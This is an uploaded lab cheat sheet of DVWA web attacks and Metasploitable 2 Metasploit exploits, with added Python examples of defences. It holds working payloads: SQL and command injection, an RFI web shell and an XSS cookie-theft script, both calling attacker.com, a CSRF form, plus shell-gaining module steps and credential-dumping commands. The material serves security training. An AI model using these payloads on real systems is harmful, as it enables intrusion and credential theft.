
Web Attacks

The document outlines various web attacks including SQL Injection, Command Injection, File Inclusion, Cross-Site Scripting (XSS), Brute Force Login, and CSRF, detailing the objectives and steps for each attack using DVWA. It also describes Metasploitable 2 exploits for different services such as VSFTPD, Apache Tomcat, UnrealIRCd, DistCC, Samba, MySQL, and Shellshock, providing the exploit modules and steps to execute them. Finally, it mentions post-exploitation actions like checking processes, escalating privileges, and dumping credentials.

Uploaded by drystankeir88

Web attacks

1. SQL Injection
Objective: Extract database information by injecting SQL queries.

Steps:
1. Go to: DVWA -> SQL Injection.

2. Enter: ' OR '1'='1 in the User ID field.

3. Click: Submit.

4. Result: Displays all users.

Extract Database Version:

' UNION SELECT NULL, version() -- -

Extract Current User:

' UNION SELECT NULL, user() -- -

Extract Database Name:

' UNION SELECT NULL, database() -- -
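Why the inputs above work and what stops them, as an added example (not code from the original document or from DVWA, which is written in PHP). The table, its rows and the function names are constructed for illustration, and SQLite stands in for MySQL so the example runs offline.

```python
import sqlite3

# Constructed sample rows standing in for the application's users table.
ROWS = [("1", "admin", "admin"), ("2", "Gordon", "Brown"), ("3", "Hack", "Me")]

def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (user_id TEXT, first_name TEXT, last_name TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?)", ROWS)
    return db

def lookup_vulnerable(db, user_id):
    # The input is pasted into the SQL text, so a quote inside it closes the
    # string literal and everything after it is parsed as SQL.
    sql = ("SELECT first_name, last_name FROM users "
           "WHERE user_id = '" + user_id + "'")
    return db.execute(sql).fetchall()

def lookup_parameterized(db, user_id):
    # The input travels as a bound value: it is only ever compared to
    # user_id and never reaches the SQL parser.
    sql = "SELECT first_name, last_name FROM users WHERE user_id = ?"
    return db.execute(sql, (user_id,)).fetchall()

def lookup_hardened(db, user_id):
    # Defence in depth: the field holds a numeric ID, so anything else is
    # rejected before the (still parameterized) query runs.
    if not (user_id.isascii() and user_id.isdigit() and len(user_id) <= 10):
        raise ValueError("user_id must be a short decimal number")
    return lookup_parameterized(db, user_id)

if __name__ == "__main__":
    db = make_db()
    print(lookup_vulnerable(db, "' OR '1'='1"))      # every row
    print(lookup_parameterized(db, "' OR '1'='1"))   # no rows
```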

2. Command Injection
Objective: Execute system commands via web input.

Steps:
1. Go to: DVWA -> Command Injection.

2. Enter: 127.0.0.1; whoami

3. Click: Submit.

4. Result: Displays the current system user.

Additional Commands:
List files: 127.0.0.1; ls

View running processes: 127.0.0.1; ps aux

Get network details: 127.0.0.1; ifconfig
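The root cause behind the inputs above and its fix, as an added example (not code from the original document or from DVWA). The function names are hypothetical, and "echo pinging" stands in for the ping call so the example runs offline; the payload is a constructed, harmless variant of the one in the steps.

```python
import ipaddress
import subprocess

def run_vulnerable(target):
    # User input is concatenated into a shell command line, so /bin/sh
    # interprets ';', '|', '&&' and backticks inside it.
    done = subprocess.run("echo pinging " + target, shell=True,
                          capture_output=True, text=True)
    return done.stdout.splitlines()

def run_no_shell(target):
    # Argument vector and no shell: the whole input is one argument, and
    # separators in it are never parsed as command syntax.
    done = subprocess.run(["echo", "pinging", target],
                          capture_output=True, text=True, check=True)
    return done.stdout.splitlines()

def run_hardened(target):
    # Validate first: the field is meant to hold an IP address, so parse it
    # as one (ValueError otherwise). This also blocks inputs that start
    # with '-' and would be read as options by the real ping binary.
    addr = ipaddress.ip_address(target.strip())
    return run_no_shell(str(addr))

# Constructed stand-in for the "127.0.0.1; whoami" input used in the steps.
PAYLOAD = "127.0.0.1; echo injected"

if __name__ == "__main__":
    print(run_vulnerable(PAYLOAD))   # two commands ran
    print(run_no_shell(PAYLOAD))     # one command, payload printed literally
```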

3. File Inclusion (LFI & RFI)


Objective: Include arbitrary files via the URL.

Local File Inclusion (LFI)


1. Go to: DVWA -> File Inclusion.

2. Modify URL: ?page=../../../../etc/passwd

3. Result: Retrieves /etc/passwd.

Remote File Inclusion (RFI)


1. Host malicious PHP script on a web server:

<?php system($_GET['cmd']); ?>

2. Modify URL: ?page=http://attacker.com/shell.php&cmd=whoami

3. Result: Executes remote command.
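A containment check that rejects both the LFI and the RFI value of the page parameter shown above, as an added example (not code from the original document or from DVWA). The function names and the sample directory are constructed for illustration.

```python
import os
import tempfile

def make_pages_dir():
    # Constructed include directory holding one legitimate page.
    base = tempfile.mkdtemp()
    with open(os.path.join(base, "include.php"), "w") as fh:
        fh.write("<?php /* sample page */ ?>")
    return base

def resolve_page(base_dir, page):
    # RFI: a value naming a URL scheme or a network path is never a local page.
    if "://" in page or page.startswith(("//", "\\\\")):
        raise ValueError("remote includes are not allowed")
    # LFI: resolve '..' segments and symlinks first, then require the
    # result to stay inside the include directory.
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, page))
    if os.path.commonpath([base, candidate]) != base:
        raise ValueError("path escapes the include directory")
    if not os.path.isfile(candidate):
        raise FileNotFoundError(page)
    return candidate

if __name__ == "__main__":
    base = make_pages_dir()
    print(resolve_page(base, "include.php"))
    for bad in ("../../../../etc/passwd", "/etc/passwd",
                "http://attacker.com/shell.php"):
        try:
            resolve_page(base, bad)
        except ValueError as err:
            print("rejected:", bad, "->", err)
```

In PHP itself, remote inclusion additionally depends on the allow_url_include setting, which should stay Off.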

4. Cross-Site Scripting (XSS)


Objective: Inject JavaScript into the web application.

Stored XSS
1. Go to: DVWA -> XSS (Stored).

2. Enter Payload: <script>alert('XSS')</script> in the comment field.

3. Click: Submit.

4. Result: Alerts when the comment is viewed.

Reflected XSS
1. Go to: DVWA -> XSS (Reflected).

2. Modify URL: ?name=<script>alert('Hacked')</script>

3. Result: Alerts immediately.

Steal Cookies:

<script>
var i = new Image();
i.src="http://attacker.com/steal.php?cookie="+document.cookie;
</script>
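The two controls that defeat the payloads above, output encoding and an HttpOnly session cookie, as an added example (not code from the original document or from DVWA). The function names are hypothetical, and PHPSESSID is assumed as the session cookie name.

```python
import html
from http.cookies import SimpleCookie

def render_comment_vulnerable(name, comment):
    # User input is written into the page as markup, so a <script>
    # element in it is executed by every browser that views the comment.
    return "<div>Name: " + name + "<br>Message: " + comment + "</div>"

def render_comment_escaped(name, comment):
    # Encode at output time: <, >, &, " and ' become character references
    # and the browser renders the payload as text.
    return "<div>Name: {}<br>Message: {}</div>".format(
        html.escape(name, quote=True), html.escape(comment, quote=True))

def session_cookie_header(session_id):
    # HttpOnly hides the cookie from document.cookie, which is what the
    # cookie-stealing script reads. Secure and SameSite limit where the
    # browser sends it.
    jar = SimpleCookie()
    jar["PHPSESSID"] = session_id          # assumed cookie name
    jar["PHPSESSID"]["path"] = "/"
    jar["PHPSESSID"]["httponly"] = True
    jar["PHPSESSID"]["secure"] = True
    jar["PHPSESSID"]["samesite"] = "Strict"
    return jar["PHPSESSID"].OutputString()

PAYLOAD = "<script>alert('XSS')</script>"  # payload from the steps above

if __name__ == "__main__":
    print(render_comment_vulnerable("test", PAYLOAD))
    print(render_comment_escaped("test", PAYLOAD))
    print("Set-Cookie:", session_cookie_header("constructed-session-id"))
```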

5. Brute Force Login


Objective: Automate login attempts.

Steps:
1. Go to: DVWA -> Brute Force.

2. Use Burp Suite to capture login request.

3. Send Request to Intruder.

4. Load Wordlist (rockyou.txt).

5. Start Attack and check valid responses.
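What makes a wordlist run like the one above fail is a server-side limit on failed attempts. The sketch below is an added example (not code from the original document or from DVWA); the class name, thresholds and event list are constructed for illustration.

```python
from collections import defaultdict, deque

class LoginThrottle:
    """Lock a key (username or source IP) after repeated failed logins."""

    def __init__(self, max_failures=5, window=300, lockout=900):
        self.max_failures = max_failures    # failures tolerated per window
        self.window = window                # sliding window, seconds
        self.lockout = lockout              # lock duration, seconds
        self.failures = defaultdict(deque)  # key -> timestamps of failures
        self.locked_until = {}

    def record(self, key, success, now):
        if now < self.locked_until.get(key, 0):
            # While locked, even a correct guess is rejected, so the
            # response tells the client nothing about the password.
            return "locked"
        if success:
            self.failures.pop(key, None)
            return "ok"
        recent = self.failures[key]
        recent.append(now)
        while recent[0] <= now - self.window:   # drop failures outside window
            recent.popleft()
        if len(recent) >= self.max_failures:
            self.locked_until[key] = now + self.lockout
            recent.clear()
            return "locked"
        return "failed"

def replay(events, throttle):
    return [throttle.record(user, ok, ts) for ts, user, ok in events]

# Constructed events: (unix_seconds, username, password_was_correct).
EVENTS = [(t, "admin", False) for t in range(5)] + [
    (5, "admin", True),     # correct guess during the lockout
    (904, "admin", True),   # legitimate login after the lockout expires
]

if __name__ == "__main__":
    print(replay(EVENTS, LoginThrottle()))
```

Keying only on the username lets anyone lock an account out, so production systems usually combine per-account and per-source limits.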

6. CSRF (Cross-Site Request Forgery)


Objective: Force a user to perform actions without consent.

Steps:
1. Go to: DVWA -> CSRF.

2. Capture request for password change.

3. Create Malicious HTML Form:

<form action="http://dvwa.com/csrf.php" method="POST">
<input type="hidden" name="password_new" value="hacked123">
<input type="hidden" name="password_conf" value="hacked123">
<input type="submit" value="Click Me">
</form>

4. Trick victim into clicking.
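The server-side check that makes a form like the one above fail: a per-session anti-CSRF token that a page on another origin cannot read or guess. This is an added example (not code from the original document or from DVWA); the handler, the csrf_token field name and the session IDs are hypothetical.

```python
import hashlib
import hmac
import secrets

SERVER_KEY = secrets.token_bytes(32)   # per-deployment secret, server-side only

def issue_token(session_id):
    # Bound to the session and embedded as a hidden field in the genuine
    # form; the HMAC means no per-session token storage is needed.
    return hmac.new(SERVER_KEY, session_id.encode(), hashlib.sha256).hexdigest()

def handle_password_change(session_id, form):
    sent = form.get("csrf_token", "").encode()
    expected = issue_token(session_id).encode()
    # Constant-time comparison; a missing token fails the same way.
    if not hmac.compare_digest(sent, expected):
        return 403, "missing or invalid CSRF token"
    new, conf = form.get("password_new", ""), form.get("password_conf", "")
    if not new or new != conf:
        return 400, "passwords do not match"
    return 200, "password changed"

# The fields of the forged form above: it carries no token, because the
# page that hosts it cannot read the victim's copy.
FORGED = {"password_new": "hacked123", "password_conf": "hacked123"}

if __name__ == "__main__":
    sid = "constructed-session-id"
    genuine = dict(FORGED, csrf_token=issue_token(sid))
    print(handle_password_change(sid, FORGED))    # (403, ...)
    print(handle_password_change(sid, genuine))   # (200, ...)
```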

These are the technical steps for each attack on Easy Mode in DVWA.

Metasploitable 2 - Metasploit Exploits


Metasploitable 2 is a deliberately vulnerable Linux VM designed for security
testing with Metasploit. Below are some Metasploit modules to exploit different
services in Metasploitable 2.

1. VSFTPD 2.3.4 - Backdoor Exploit


Vulnerable Service: FTP (Port 21)

Exploit Module: exploit/unix/ftp/vsftpd_234_backdoor

Steps:

msfconsole
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS <target_ip>
set RPORT 21
run

Result: A root shell on the target system.

2. Apache Tomcat - Weak Credentials


Vulnerable Service: Apache Tomcat (Port 8180)

Exploit Module: exploit/multi/http/tomcat_mgr_deploy

Steps:

msfconsole
use exploit/multi/http/tomcat_mgr_deploy
set RHOSTS <target_ip>
set RPORT 8180
set HttpUsername tomcat
set HttpPassword tomcat
run

Result: A shell via deploying a malicious WAR file.
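The steps above succeed only because a manager account has a guessable password. The audit below flags such accounts in a tomcat-users.xml file; it is an added example (not code from the original document or from Tomcat), and the sample file and the guessable-password list are constructed.

```python
import xml.etree.ElementTree as ET

# Constructed sample in the tomcat-users.xml format; the tomcat/tomcat
# pair is the one set in the steps above.
SAMPLE = """<tomcat-users>
  <role rolename="manager"/>
  <user username="tomcat" password="tomcat" roles="tomcat,manager"/>
  <user username="deployer" password="kV9#constructed-long-secret" roles="manager-script"/>
  <user username="viewer" password="viewer" roles="status"/>
</tomcat-users>
"""

GUESSABLE = {"", "tomcat", "admin", "manager", "password", "changeme"}  # constructed
DEPLOY_ROLES = {"manager", "manager-gui", "manager-script"}  # can deploy WAR files

def audit_tomcat_users(xml_text):
    """Return (username, severity) for every account with a weak password."""
    findings = []
    for el in ET.fromstring(xml_text).iter():
        if el.tag.rsplit("}", 1)[-1] != "user":    # tolerate an xmlns on the root
            continue
        name = el.get("username") or el.get("name") or ""
        password = el.get("password", "")
        roles = {r.strip() for r in el.get("roles", "").split(",") if r.strip()}
        weak = password.lower() in GUESSABLE or password.lower() == name.lower()
        if weak:
            # A weak password on a deploy-capable role is what turns a
            # login guess into code execution.
            severity = "CRITICAL" if roles & DEPLOY_ROLES else "WARN"
            findings.append((name, severity))
    return findings

if __name__ == "__main__":
    for user, severity in audit_tomcat_users(SAMPLE):
        print(severity, user)
```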

3. UnrealIRCd 3.2.8.1 - Remote Code Execution


Vulnerable Service: UnrealIRCd (Port 6667)

Exploit Module: exploit/unix/irc/unreal_ircd_3281_backdoor

Steps:

msfconsole
use exploit/unix/irc/unreal_ircd_3281_backdoor
set RHOSTS <target_ip>
set RPORT 6667
run

Result: A remote shell.

4. DistCC Daemon - Remote Code Execution


Vulnerable Service: DistCC (Port 3632)
Exploit Module: exploit/unix/misc/distcc_exec

Steps:

msfconsole
use exploit/unix/misc/distcc_exec
set RHOSTS <target_ip>
set RPORT 3632
run

Result: A root shell.

5. Samba smbd 3.0.20 - Command Execution


Vulnerable Service: Samba (Port 139/445)
Exploit Module: exploit/linux/samba/usermap_script

Steps:

msfconsole
use exploit/linux/samba/usermap_script
set RHOSTS <target_ip>
set RPORT 139
run

Result: A remote shell.

6. MySQL - Authentication Bypass


Vulnerable Service: MySQL (Port 3306)
Exploit Module: auxiliary/scanner/mysql/mysql_login

Steps:

msfconsole
use auxiliary/scanner/mysql/mysql_login
set RHOSTS <target_ip>
run

Result: Retrieves weak MySQL credentials.

7. Shellshock - Apache Mod_CGI


Vulnerable Service: Apache (Port 80)

Exploit Module: exploit/multi/http/apache_mod_cgi_bash_env_exec

Steps:

msfconsole
use exploit/multi/http/apache_mod_cgi_bash_env_exec
set RHOSTS <target_ip>
run

Result: A remote shell via Shellshock.

Post-Exploitation
After getting a shell, you can:

Check running processes: ps aux

Escalate privileges: sudo -l

Dump credentials: cat /etc/passwd

Pivot to internal systems.
